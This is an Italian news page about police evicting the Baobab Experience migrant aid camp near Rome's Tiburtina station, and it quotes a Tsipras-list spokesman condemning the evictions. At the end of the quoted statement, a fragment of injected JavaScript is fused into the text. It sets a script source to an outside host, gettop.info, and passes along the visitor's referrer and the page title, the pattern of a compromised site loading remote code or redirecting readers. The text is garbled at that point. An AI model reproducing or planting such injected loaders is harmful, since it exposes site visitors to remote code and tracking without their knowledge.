La protesta alla stazione Tiburtina e le tende per i migranti (Fonte Facebook Baobab Experience - foto Mattina Ciampicacigli)
La protesta alla stazione Tiburtina e le tende per i migranti (Fonte Facebook Baobab Experience - foto Mattina Ciampicacigli)

“Solidarietà ai volontari del Baobab, basta sgomberi, servono soluzioni immediate”

Non c’è pace per il Baobab. Non è passato neanche un mese dall’ultimo sgombero in piazzale San Lorenzo, dopo che l’associazione era stata cacciata da via Cupra dove aveva allestito un campo per dare assistenza ai migranti transitanti che passavano per Roma, che un nuovo atto di forza è stato fatto nei confronti dell’associazione. Giovedì c’è stato l’ennesimo sgombero da parte della polizia in piazzale Spadolini, alle spalle della stazione Tiburtina, dove centinaia di migranti avevano trovato assistenza e riparo nel parcheggio abbandonato della stazione, con le forze dell’ordine che hanno provveduto a sigillare le entrate e lasciando i migranti all’aperto senza neanche un riparo sotto cui dormire.

“È una situazione non più tollerabile – sottolinea il portavoce dell’Altra Europa con Tsipras Roma, Ferruccio Nobili -. Contro i volontari del Baobab Experience si sta mettendo in atto una vera e propria campagna di repressione nella quale le istituzioni preferiscono l’emergenza continua, con centinaia di migranti che vagano per la città, invece di favorire e tutelare quelle buone esperienze che, sostituendosi allo Stato volontariamente e gratuitamente, riescono a dare assistenza, cibo e un riparo a quanti non hanno niente e rischiano di dormire sotto i ponti. Questa si che sarebbe una vera emergenza sociale.

Invece le istituzioni non solo non tutelano queste esperienze ma fanno di tutto per distruggere quello che di buono si sta facendo, senza dare alcuna soluzione alternativa. Prima dell’estate lo sgombero da un edificio abbandonato in via Cupa, poi a settembre la cacciata dalla stessa via, diventata un punto di ritrovo per migliaia di migranti transitanti, per arrivare alla dispersione da piazzale San Lorenzo e l’atto di forza di giovedì a piazzale Spadolini. E non basta neanche la promessa di creare un hub dell’accoglienza fatta venerdì dall’assessore ai servizi sociali del Comune di Roma, Baldassarre. L’emergenza è adesso e soluzioni alternative dovevano già essere state create. Per questo – conclude Nobili – l’Altra Europa con Tsipras esprime solidarietà ai volontari del Baobab, è al loro fianco e condanna con forza ogni tentativo di sgombero, passato e futuro, chiedendo al contempo soluzioni immediate e non libri dei sogni realizzabili chissà quando. Ieri comandava mafia capitale, ma oggi, se è vero che le cose sono cambiate, ci aspettiamo atti concreti ed immediati dalla Sindaca Raggi.”}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>